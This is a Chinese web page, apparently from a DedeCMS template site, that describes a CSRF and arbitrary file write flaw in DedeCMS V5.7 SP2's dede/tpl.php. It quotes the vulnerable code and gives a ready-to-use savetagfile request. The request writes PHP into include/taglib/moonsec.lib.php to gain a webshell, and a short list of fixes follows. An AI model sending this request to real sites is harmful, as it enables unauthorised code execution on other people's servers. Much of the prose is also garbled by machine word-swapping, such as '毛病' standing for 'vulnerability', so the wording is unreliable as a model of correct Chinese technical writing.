dedecms V5.7 SP2 友谊链接CSRF+恣意文件写入毛病

DedeCMS V5.7 SP2版本中tpl.php存在代码执行毛病,攻击者可使用该毛病在增添新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本法式,停止发稿,毛病依然存在。

毛病详情

织梦默认的后台地址是/dede/,固然也可以被更改,到时间凭据网站详细情形替换默认后台地址即可。

dede/tpl.php中第251行到281行

csrf_check();

if(!preg_match(“#^[a-z0-9_-]{1,}\.lib\.php$#i”, $filename))

{

ShowMsg(‘文件名不正当,不允许举行操作!’, ‘-1’);

exit();

}

require_once(DEDEINC.’/oxwindow.class.php’);

$tagname = preg_replace(“#\.lib\.php$#i”, “”, $filename);

$content = stripslashes($content);

$truefile = DEDEINC.’/taglib/’.$filename;

$fp = fopen($truefile, ‘w’);

fwrite($fp, $content);

fclose($fp);

1.由于dedecms全局变量注册的特征,以是这里的content变量和filename变量可控。

2.可以看到将content直接写入到文件中导致可以getshell。可是这里的文件名经由正则表达式,以是必须要.lib.php末端。

注重: 这里另有一个csrf_check()函数,即请求中必须要带token参数。

毛病使用

1.首先获取token 会见 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值

dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

然后会见 :

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

shell:域名 + /include/taglib/moonsec.lib.php

毛病修复

1.克制/include/taglib/此处写入文件。

2.过滤恶意标签

3.删除dede/tpl.php 文件

①本站所有织梦模板资源均来自用户分享和网络收集,如果侵犯了您的权益,请联系网站客服处理
②本站提供的织梦源码,均带数据及演示地址。可以在任一源码详情页查看演示地址。
③由于博主时间紧缺,所有模板源码不提供技术支持。仅部分收费原创源码提供售后
④如遇模板源码下载链接打不开或者有错误,请联系网站客服QQ指出纠正。
人民币与金币汇率为1比1,即1元=1金币
织梦楼 » dedecms V5.7 SP2 友谊链接CSRF+恣意文件写入毛病

发表评论

加入织梦楼永久VIP 海量资源免费下载

目前为止共有 1050 位会员加入